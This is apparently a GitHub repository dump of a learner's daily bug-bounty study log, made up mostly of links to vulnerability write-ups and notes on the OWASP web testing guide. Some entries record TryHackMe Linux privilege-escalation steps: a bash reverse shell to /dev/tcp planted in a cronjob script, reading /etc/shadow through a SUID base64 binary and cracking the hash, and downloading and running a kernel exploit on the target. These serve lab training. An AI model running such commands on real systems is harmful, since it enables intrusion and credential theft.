https://medium.com/techiepedia/how-to-report-dmarc-vulnerabilities-efficiently-to-earn-bounties-easily-f7a65ecdd20b
https://shahjerry33.medium.com/mail-server-misconfiguration-f42734d19678
✅ Youtube Video
https://www.youtube.com/watch?v=LNwjEK4Ckyc
https://www.youtube.com/watch?v=nlFAj2raoj4
✅ THM Room
https://tryhackme.com/room/overlayfs
#bugbounty #infosec #learn365
================================================
FILE: Resources/Day 09 Task.md
================================================
🎯 Day 9 Task
✅ CSRF Video
https://www.youtube.com/watch?v=iyE9UsBF64w
✅ POC
https://www.youtube.com/watch?v=TGJ4I-F5LhE
https://www.youtube.com/watch?v=YPnejsLPfVk
https://www.youtube.com/watch?v=gBdiKqNPQS8
https://www.youtube.com/watch?v=5jHIUTEdpvI
✅ CSRF Writeup
https://infosecwriteups.com/understanding-exploiting-cross-site-request-forgery-csrf-vulnerabilities-935952375b71
https://huntr.dev/bounties/f952af13-8042-457d-b8d8-bd338987dc02/
✅ Tweet
https://twitter.com/rootxyash/status/1480126074994368512
https://twitter.com/mavericknerd/status/1214071332083658757
-----------------------------------------------------------------------------------
🔁 THM Room
➡ Working on Linux PrivEsc Room
✅ Completed till Task 6 Privilege Escalation Sudo
https://tryhackme.com/room/linprivesc
For more Info check out my Github Repo
https://github.com/Imran407704/Learn365/
Some Tips :
The Kernel exploit methodology is simple :
1. Identify the kernel version
2. Search and find an exploit code for the kernel version of the target system
3. Run the exploit
Remember that: a failed kernel exploit can lead to a system crash :P
The Sudo exploit methodology :
1. First check how many programs normal user run with sudo rights -: sudo -l
2. go to https://gtfobins.github.io & search the binary file which have sudo rights
3. Paste that Command & You are Root User :)
Some Keywords :
| String | Meaning |
| ----------------- | --------------------------------- |
| Local system | My Computer |
| EXPL_FILE | Name of that Particular Exploit (in my case the name of exploit is 37292) |
| IP:PORT | VPN IP (If you are on tryhackme) / local system IP:jo port se http server bana tha |
| - (hypen) | hypen ke baad command hai :) |
My Steps for Kernel Exploit :
1. Exploit ko local system me - wget https://www.exploit-db.com/exploits/EXPL_FILE se download kiya
2. gcc se complile kiya - gcc 37292.c exploit
3. local system me http server banaya - sudo python3 -m http.server
4. & Then target machine ke tmp (temp) directory me jaana hai bcoz yehi directory aisi hai jisme hamey write ki permission hai mai ne home directory me bhi check kiya but waha par exploit ko local machine se transfer nhi kar pa rha tha - wget http://IP:PORT/exploit (remember that http use karna hai not https )
5. ./exploit
ROOT User :)
My Steps for Sudo Exploit :
1. First check how many programs normal user run with sudo rights - sudo -l
2. go to https://gtfobins.github.io & search the binary file which have sudo rights
------------------------------------------------------------------------------------------------------------------------------------------------------
#bugbounty #privesc #infosec #learn365
================================================
FILE: Resources/Day 10 Task.md
================================================
🎯 Day 10 Task
✅ Clickjacking
https://www.youtube.com/watch?v=Unu41TIk8CY
✅ Poc
https://www.youtube.com/watch?v=rz2XmteeFMo
✅ Writeup
https://medium.com/@raushanraj_65039/google-clickjacking-6a04132b918a
https://hackerone.com/reports/299009
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 7 Privilege Escalation SUID
😒 I Saw a Walkthrough bcoz this is my 1st PrivEsc
Some Tips:
**cat /etc/passwd** me se user ka naam mila (1st answer)
Command for listing the binaries file which has SUID & SGID bits
**find / -type f -perm -04000 -ls 2>/dev/null**
Har 1 Binary ko gtfobins me dekha koi SUID ke saath exploit hai kya **base64** mila
Fir **LFILE=/etc/shadow**
**/usr/bin/base64 “$LFILE” | base64 –decode** : karke passwd ka hash nikala & then Hash ko ek file me save kiya **hash.txt**
**john hash.txt --show** : mil gaya passwd
**su user2 & passwd**
**cd home/ubuntu**
**cat flag3.txt** but permission denied then
Then try **LFILE=/home/ubuntu/flag3.txt**
**/usr/bin/base64 “$LFILE” | base64 –decode**
**cat flag3.txt** & got flag :)
================================================
FILE: Resources/Day 100 Task.md
================================================
🎯 Day 100 Task
🥳🥳🥳 Yay Glad to Share that I am Consistently learning #infosec #bugbounty & today is my #Day100 I learned a lots of new things & explored New Stuff Daily This is the best Feeling ever & This is my Small Achivement.🥳🥳🥳
Alhamdulillah For everything !!!!
✅ RCE with Flask Jinja Template Injection
https://akshukatkar.medium.com/rce-with-flask-jinja-template-injection-ea5d0201b870
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 101 Task.md
================================================
🎯 Day 101 Task
✅ How I could have hacked your Uber account
https://www.appsecure.security/blog/how-i-could-have-hacked-your-uber-account
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 102 Task.md
================================================
🎯 Day 102 Task
✅ Bug Bounty Live Recon - Linked / JS Discovery!
https://youtu.be/yT_IqBMwLFg
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 103 Task.md
================================================
🎯 Day 103 Task
✅ HTTP Request Smuggling on business.apple.com and Others
https://medium.com/@StealthyBugs/http-request-smuggling-on-business-apple-com-and-others-2c43e81bcc52
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 104 Task.md
================================================
🎯 Day 104 Task
✅ SVG SSRFs and saga of bypasses
https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7
✅ A Detailed Guide on Cewl
https://www.hackingarticles.in/a-detailed-guide-on-cewl/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 105 Task.md
================================================
🎯 Day 105 Task
✅ How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
https://infosecwriteups.com/how-a-youtube-video-lead-to-pwning-a-web-application-via-sql-injection-worth-4324-bounty-285f0a9b9f6c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 106 Task.md
================================================
🎯 Day 106 Task
✅ XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain
https://medium.com/@Bishoo97x/xss-html-injection-and-file-upload-bypass-in-huawei-subdomain-64966ba4f4ac
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 107 Task.md
================================================
🎯 Day 107 Task
✅ How Token Misconfiguration can lead to takeover account
https://cryptograph3r.blogspot.com/2022/03/how-token-misconfiguration-can-lead-to.html
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 108 Task.md
================================================
🎯 Day 108 Task
✅ How to hack any Payment Gateway?
https://infosecwriteups.com/how-to-hack-any-payment-gateway-1ae2f0c6cbe5
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 109 Task.md
================================================
🎯 Day 109 Task
✅ Race Condition bypassing team limit
https://arbazhussain.medium.com/race-condition-bypassing-team-limit-b162e777ca3b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 11 Task.md
================================================
🎯 Day 11 Task
✅ Learn Something new in Live Bug Hunting Session
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 8 Privilege Escalation **Capabilities**
My Steps :
First enter this command for checking how many binaries have capabilities
**getcap -r / 2>/dev/null**
Then I go to the home & other user directory **cd /home/ubuntu** & then **ls -a**
**id**
**cat flag4.txt**
#learn365 #infosec
================================================
FILE: Resources/Day 110 Task.md
================================================
🎯 Day 110 Task
✅ Bypass Apple Corp SSO on Apple Admin Panel
https://medium.com/@StealthyBugs/bypass-apple-corp-sso-on-apple-admin-panel-dbfb72c7e634
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 111 Task.md
================================================
🎯 Day 111 Task
✅ The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise
https://logicbomb.medium.com/the-unusual-case-of-open-redirection-to-aws-security-credentials-compromise-59acc312f02b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 112 Task.md
================================================
🎯 Day 112 Task
✅ Find security bugs while you sleep! Using nuclei templates, and more..
https://youtu.be/P5asvR0h3OQ
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 113 Task.md
================================================
🎯 Day 113 Task
✅ Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings
https://medium.com/@johnssimon_6607/getting-access-to-disabled-hidden-features-with-the-help-of-burp-match-and-replace-e1d7b70d131e
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 114 Task.md
================================================
🎯 Day 114 Task
✅ Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 115 Task.md
================================================
🎯 Day 115 Task
✅ How I chained two vulnerabilities to steal credit card details?
https://www.codedbrain.com/how-i-chained-two-vulnerabilities-to-steal-credit-card-details/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 116 Task.md
================================================
🎯 Day 116 Task
✅ How I Made The BBC Hall Of Fame 3 Times
https://medium.com/@tobydavenn/how-i-made-the-bbc-hall-of-fame-3-times-2c816fa515d7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 117 Task.md
================================================
🎯 Day 117 Task
✅ Improper cookie not expiring after logged out!
https://medium.com/@mujios101/improper-cookie-not-expiring-after-logged-out-ba43e9033459
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 118 Task.md
================================================
🎯 Day 118 Task
✅ Open-Redirects
https://medium.com/@souravgro25/open-redirects-a93b01f31868
✅ What you doing wrong when you fail at bug bounties?
https://medium.com/@gguzelkokar.mdbf15/what-you-doing-wrong-when-you-fail-at-bug-bounties-143d2e0e6e2b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 119 Task.md
================================================
🎯 Day 119 Task
✅ Bypassing WAF for $2222
https://divyanshsharma2401.medium.com/bypassing-waf-for-2222-f99b80cfdb9b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 12 Task.md
================================================
🎯 Day 12 Task
➡️ Working on Bug bounty Wordlist tool inspired by [Kathan Patel](https://twitter.com/KathanP19)
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 9 Privilege Escalation Cronjob
My Steps :
First find how many cronjobs set ?
**cat /etc/crontab**
then edit the script **nano /../..file.sh**
**#!/bin/bash
bash -i >& /dev/tcp/IP/PORT 0>1** ---------------> [ Here IP = TryHackMe VPN IP & Same PORT number which you use in nc ]
then run **nc -lvnp PORT**
wait some minutes & then you got root shell :)
#infosec #learn365 #privesc
================================================
FILE: Resources/Day 120 Task.md
================================================
🎯 Day 120 Task
✅ Subdomain Takeover using Mobile??
https://0xshakhawat.medium.com/subdomain-takeover-using-mobile-da9c8e81bc1c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 121 Task.md
================================================
🎯 Day 121 Task
✅ Fuzzing and credentials leakage..awesome bug hunting writeup
https://medium.com/@abdalrahman.alshammas/fuzzing-and-credentials-leakage-nice-bug-hunting-writeup-38b2e774b300
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 122 Task.md
================================================
🎯 Day 122 Task
✅ OTP bypass with response manipulation.
https://ertugrull.medium.com/otp-bypass-with-response-manipulation-12646c6d7f33
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 123 Task.md
================================================
🎯 Day 123 Task
There is no task Today Enjoy Eid Festival
🥳😊😃
#learn365 #eid2022 #eidmubarak2022
================================================
FILE: Resources/Day 124 Task.md
================================================
🎯 Day 124 Task
✅ An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
https://medium.com/@daniel.j.hunt/an-bug-bounty-hunters-guide-to-idor-vulnerabilities-27012bbccd7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 125 Task.md
================================================
🎯 Day 125 Task
✅ How I got a lousyT-Shirt from the Dutch Government.
https://maxva.medium.com/how-i-got-a-lousyt-shirt-from-the-dutch-goverment-2a0d13fe7675
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 126 Task.md
================================================
🎯 Day 126 Task
✅ Hack the HAckers
https://raoshaab.medium.com/hack-the-hackers-7d4ffbc70858
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 127 Task.md
================================================
🎯 Day 127 Task
✅ The $16,000 Dev Mistake
https://medium.com/@masonhck357/the-16-000-dev-mistake-13e516e86be6
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 128 Task.md
================================================
🎯 Day 128 Task
✅ Denial of Service through …
https://medium.com/@sathvika03/denial-of-service-through-55368b323839
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 129 Task.md
================================================
🎯 Day 129 Task
✅ How i found a vulnerability that leads to access any users’ sensitive data and got $500
https://medium.com/@robert0/how-did-i-find-a-vulnerability-that-leads-to-access-any-users-sensitive-data-and-got-500-5cce1c21d86a
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 13 Task.md
================================================
🎯 Day 13 Task
✅ Start Learning OWASP Web Application Security Testing
4.1 Information Gathering
✅ 4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage
https://infosecwriteups.com/dorking-for-bug-bounties-d81cc857b2c8
✅ Tools
https://github.com/BullsEye0/dorks-eye
🔁 THM Room
⏸️ Pause Linux PrivEsc
➡️ Working on Linux PrivEsc Arena
https://tryhackme.com/room/linuxprivescarena
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 130 Task.md
================================================
🎯 Day 130 Task
✅ ToolTime - Cloud Recon 1
https://youtu.be/7hKEfF-yR1w
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 131 Task.md
================================================
🎯 Day 131 Task
✅ A Fun SSRF through a Headless Browser
https://corben.io/fun-ssrf-via-headless-browser/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 132 Task.md
================================================
🎯 Day 132 Task
✅ 2FA Bypass in PickMyCareer.in
https://jayateerthag.medium.com/2fa-bypass-in-pickmycareer-in-8abbde4c4903
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 133 Task.md
================================================
🎯 Day 133 Task
✅ Exploiting Google Maps API keys for profit
https://infosecwriteups.com/exploiting-google-maps-api-keys-for-profit-3903dd2c829c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 134 Task.md
================================================
🎯 Day 134 Task
✅ Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
https://medium.com/@unurbayar1998/creator-studios-api-endpoint-is-vulnerable-to-idor-exposes-p40-earnings-usd-f57327759ffc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 135 Task.md
================================================
🎯 Day 135 Task
✅ I have 1% chance to hack this company
https://infosecwriteups.com/i-have-1-chance-to-hack-this-company-1044879f41a9
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 136 Task.md
================================================
🎯 Day 136 Task
✅ HTTP Request Smuggling: Part-1 (Concepts)
https://medium.com/nerd-for-tech/http-request-smuggling-part-1-concepts-b89bfe17b210
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 137 Task.md
================================================
🎯 Day 137 Task
✅ Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
https://infosecwriteups.com/create-your-ultimate-bug-bounty-automation-without-nerdy-bash-skills-part-1-a78c2b109731
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 138 Task.md
================================================
🎯 Day 138 Task
✅ Can analyzing javascript files lead to remote code execution?
https://melotover.medium.com/can-analyzing-javascript-files-lead-to-remote-code-execution-f24112f1aa1f
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 139 Task.md
================================================
🎯 Day 139 Task
✅ My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Information's & In Some cases Passwords At More Than 1000 Companies
https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 14 Task.md
================================================
🎯 Day 14 Task
✅ 4.1.2 Fingerprint Web Server
_Objective_
Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
✅ How to Test
Nmap - **nmap -sV --script=banner TARGET**
Note : Exposed server information is not necessarily in itself a vulnerability, it is information that can assist attackers in exploiting other vulnerabilities that may exist
✅ Remediation
1. Obscuring web server information in headers, such as with Apache’s mod_headers module.
2. Using a hardened reverse proxy server to create an additional layer of security between the web server and the Internet.
3. Ensuring that web servers are kept up-to-date with the latest software and security patches.
✅ THM Room
https://tryhackme.com/room/linuxprivescarena
Github Repo
https://github.com/Imran407704/Learn365
**Disclaimer- I am making notes from Official OWASP Website you can check it from here**
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 140 Task.md
================================================
🎯 Day 140 Task
✅ Origin IP found, WAF Cloudflare Bypass
https://hackerone.com/reports/1536299
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 141 Task.md
================================================
🎯 Day 141 Task
✅ MFA (Multi-Factor Authentication)
https://akash-venky091.medium.com/mfa-multi-factor-authentication-24d2002b9ad7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 142 Task.md
================================================
🎯 Day 142 Task
✅ Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 143 Task.md
================================================
🎯 Day 143 Task
✅ Does ms15–034 still exist today ?
https://medium.com/@ryuukhagetsu/does-ms15-034-still-exist-today-c7e11664349c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 144 Task.md
================================================
🎯 Day 144 Task
✅ How I managed to take over any account visits my profile with Stored XSS
https://0xmahmoudjo0.medium.com/how-i-managed-to-take-over-any-account-visits-my-profile-with-stored-xss-6b378d33e90f
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 145 Task.md
================================================
🎯 Day 145 Task
✅ The Bucket’s Got a Hole in it
https://medium.com/@manikesh-singh/the-buckets-got-a-hole-in-it-343b676e23d4
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 15 Task.md
================================================
🎯 Day 15 Task
✅ 4.1.3 Review Webserver Metafiles for Information Leakage
Objective
1. Identify hidden or obfuscated paths and functionality through the analysis of metadata files.
2. Extract and map other information that could lead to better understanding of the systems at hand.
✅ How to Test
Spider/crawler, Google Dorks, Burpsuite/ZAP
1. robots.txt - curl -O -Ss http://www.TARGET.TLD/robots.txt
2. Sitemap.xml - wget --no-verbose https://www.TARGET.TLD/sitemap.xml
3. Security.txt - wget --no-verbose https://www.linkedin.com/.well-known/security.txt
https://TARGET.TLD/security.txt or https://TARGET.TLD/.well-known/security.txt
4. humans.txt - wget --no-verbose https://www.google.com/humans.txt
✅ Tools
wget, BurpSuite, Dev Tools
✅ THM Room
https://tryhackme.com/room/linuxfundamentalspart3
Github Repo
https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 16 Task.md
================================================
🎯 Day 16 Task
✅ 4.1.4 Enumerate Applications on Webserver
Test Objectives
Enumerate the applications within scope that exist on a web server.
1. Different Base URL
3. Non-standard Ports
5. Virtual Hosts
7. DNS Zone Transfers
9. DNS Inverse Queries
11. Web-based DNS Searches
13. Reverse-IP Services
15. Googling
17. Digital Certificates
✅ Tools
1. nslookup, dig
2. Search engines - Google, Bing
3. Nmap
Github Repo
https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 17 Task.md
================================================
🎯 Day 17 Task
✅ 4.1.5 Review Webpage Content for Information Leakage
Test Objectives
1. Review webpage comments, metadata, and redirect bodies to find any information leakage.
3. Gather JavaScript files and review the JS code to better understand the application and to find any information leakage.
5. Identify if source map files or other front-end debug files exist.
How to Test
1. Review Webpage, Comments and Metadata
3. Identifying JavaScript Code and Gathering JavaScript Files (Look for values such as: API keys, internal IP addresses, sensitive routes, or credentials)
5. Identifying Source Map Files
7. Identify Redirect Responses which Leak Information
Tools
Burpsuite/ZAP
wget
✅ THM Room
https://tryhackme.com/room/passiverecon
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 18 Task.md
================================================
🎯 Day 18 Task
✅ P1 Bugs WriteUp
https://medium.com/@harrmahar/how-i-get-my-first-p1-sensitive-information-disclosure-using-wpscan-c2fba00ac361
https://medium.com/@sw33tlie/finding-a-p1-in-one-minute-with-shodan-io-rce-735e08123f52
https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4
✅ 4.1.6 Identify Application Entry Pointss
Test Objectives
1. Identify possible entry and injection points through request and response analysis.
Requests
1. Identify where GETs are used and where POSTs are used.
3. Identify all parameters used in a POST request (these are in the body of the request).
5. Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren’t seen unless a proxy or view the HTML source code is used. In addition, the next page shown, its data, and the level of access can all be different depending on the value of the hidden parameter(s).
7. Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).
9. Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &, \~, :, or any other special character or encoding.
11. Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &, \~, :, or any other special character or encoding.
13. Also pay attention to any additional or custom type headers not typically seen (such as debug: false).
Responses
1. Identify where new cookies are set (Set-Cookie header), modified, or added to.
3. Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests).
5. Also note where any interesting headers are used. For example, Server: BIG-IP indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used.
✅ Tools
Burpsuite/ZAP
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 19 Task.md
================================================
🎯 Day 19 Task
✅ Github Recon
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
https://nitter.net/therceman/status/1434587086011748354
✅ 4.1.7 Map Execution Paths Through Application
Test Objectives
Map the target application and understand the principal workflows.
How to Test
1. Path
Test each of the paths through an application that includes combinatorial and boundary value analysis testing for each decision path
2. Data Flow
Focuses on mapping the flow, transformation and use of data throughout an application.
3. Race
Tests multiple concurrent instances of the application manipulating the same data..
✅ Tools
Automatic Spidering (BurpSuite/ZAP)
Automatic spider is a tool used to automatically discover new resources (URLs) on a particular website.
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 20 Task.md
================================================
🎯 Day 20 Task
✅ Recon Techniques
https://securib.ee/beelog/the-best-bug-bounty-recon-methodology/
https://www.bugcrowd.com/resources/webinars/practical-recon-techniques-for-bug-hunters-pen-testers/
https://infosecsanyam.medium.com/bug-bounty-methodology-ttp-tactics-techniques-and-procedures-v-2-0-2ccd9d7eb2e2
✅ TryHackMe Room
https://tryhackme.com/room/pythonbasics
✅ 4.1.8 Fingerprint Web Application Framework
Test Objectives
Fingerprint the components being used by the web applications.
How to Test
1. HTTP headers
2. Cookies
3. HTML source code
4. Specific files and folders
5. File extensions
6. Error messages
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. HTTP headers - Identifying a web framework by **X-Powered-By** field in the HTTP response header. Use netcat command - **nc 127.0.0.1 80**
This methodology doesn’t work in 100% of cases,It is possible to easily disable **X-Powered-By** header by a proper configuration.
2. Cookies - Identifying a web framework by Cookies field in the HTTP request header but it is possible to change the name of cookies
3. HTML Source Code
4. Specific Files and Folders - Use directory brute forcing on a target with known folder and filenames and monitoring HTTP-responses to enumerate server content.
5. File Extensions : Here are some common web file extensions and associated technologies:
.php – PHP
.aspx – Microsoft ASP.NET
.jsp – Java Server Pages
6. Error Messages
You can see the Error Messages on the Web page
✅ Tools
1. WhatWeb
2. Wappalyzer
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 21 Task.md
================================================
🎯 Day 21 Task
✅ 4.1.9 Fingerprint Web Application (Merged into 4.1.8)
✅ THM Room
https://tryhackme.com/room/historyofmalware
✅ 4.1.10 Map Application Architecture
Test Objectives
Understand the architecture of the application and the technologies in use.
How to Test
1. Web Server
Simple applications may run on a single server, which can be identified by Date, Server, Last-Modified, ETag, Accept-Ranges, Content-Length, Connection, Content-Type
2. Platform-as-a-Service (PaaS)
It is possible to identify the use of PaaS, as the application may use a specific domain name (for example, applications deployed on Azure App Services will have a *.azurewebsites.net domain - although they may also use custom domains)
3. Serverless
In a Serverless model, the developers provide code which is directly run on a hosting platform as individual functions, rather than as an traditional larger web application deployed in a webroot.
For example, AWS Lambda functions will typically return the following headers:
X-Amz-Invocation-Type
X-Amz-Log-Type
X-Amz-Client-Context
4. Microservices -
In a microservice-based totally architecture, the software API is made of more than one discrete offerings, instead of strolling as a monolithic software. The services themselves often run inner bins (normally with Kubernetes). Although they're generally behind a single API gateway and area.
5. Static Storage -
Many applications store static content on dedicated storage platforms, rather than hosting it directly on the main web server. The two most common platforms are Amazon’s S3 Buckets, and Azure’s Storage Accounts, and can be easily identified by the domain names:
1. Amazon S3 Buckets are either BUCKET.s3.amazonaws.com or s3.REGION.amazonaws.com/BUCKET
2. Azure Storage Accounts are ACCOUNT.blob.core.windows.net
6. Database -
a. Port scanning the server and looking for any open ports associated with specific databases.
b. Triggering SQL (or NoSQL) related error messages (or finding existing errors from a search engine.
Other Database -
Windows, IIS and ASP.NET often use Microsoft SQL server.
Embedded systems often use SQLite.
PHP often uses MySQL or PostgreSQL.
APEX often uses Oracle.
7. Authentication
a. Web server configuration
b. Local user accounts in a database.
c. An existing central authentication source such as Active Directory or an LDAP server
d. Single Sign-On (SSO) with either an internal or external provider.
8. Third Party Services and APIs
Almost all web applications include third party resources that are loaded or interacted with by the client. These can include:
a.Active content (such as scripts, style sheets, fonts, and iframes).
b.Passive content (such as images and videos).
c.External APIs.
d.Social media buttons.
e.Advertising networks.
f.Payment gateways.
Network Components
1. Reverse Proxy
a. Acting as a load balancer or web application firewall.
b. Allowing multiple applications to be hosted on a single IP address or domain (in subfolders).
c. Implementing IP filtering or other restrictions.
d. Caching content from the back end to improve performance.
It is not always possible to detect a reverse proxy (especially if there is only a application behind it), but you can often sometimes identify it by:
a. A mismatch between the front end server and the back end application (such as a Server: nginx header with an ASP.NET application).
b. This can sometimes lead to request smuggling vulnerabilities.
c. Duplicate headers (especially the Server header).
d. Multiple applications hosted on the same IP address or domain (especially if they use different languages).
Load Balancer
Load balancers can be difficult to detect, but can sometimes be identified by making multiple requests and examining the responses for differences, such as:
a. Inconsistent system times.
b. Different internal IP addresses or hostnames in detailed error messages.
c. Different addresses returned from Server-Side Request Forgery (SSRF).
Content Delivery Network (CDN)
When testing a site behind a CDN, you should bear in mind the following points:
a. The IPs and servers belong to the CDN provider, and are likely to be out of scope for infrastructure testing.
b. Many CDNs also include features like bot detection, rate limiting, and web application firewalls.
c. CDNs usually cache content, so any changes made to the back end website may not appear immediately.Security Components
Security Components
1. Network Firewall
Most web servers will be protected by a packet filtering or stateful inspection firewall, which blocks any network traffic that is not required. To detect this, perform a port scan of the server and examine the results.
2. Web Application Firewall (WAF)
A WAF can be deployed in multiple locations, including:
a. On the web server itself.
b. On a separate virtual machine or hardware appliance.
c. In the cloud in front of the back end server.
If a cloud-based WAF is in use, then it may be possible to bypass it by directly accessing the back end server, using the same methods discussed in the Content Delivery Network section.
Github Repo
https://github.com/Imran407704/Learn365
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 22 Task.md
================================================
🎯 Day 22 Task
✅ 4.1.10 Map Application Architecture (Completed)
✅ THM Room
https://tryhackme.com/room/investigatingwindows
✅ 4.2 Configuration and Deployment Management Testing
Test Objectives
1. Review the applications’ configurations set across the network and validate that they are not vulnerable.
2. Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.
Read the website for better understanding !
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/01-Test_Network_Infrastructure_Configuration
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 23 Task.md
================================================
🎯 Day 23 Task
✅ THM Room
https://tryhackme.com/room/attacktivedirectory
✅ 4.2.2 Test Application Platform Configuration
Test Objectives
1. Ensure that defaults and known files have been removed.
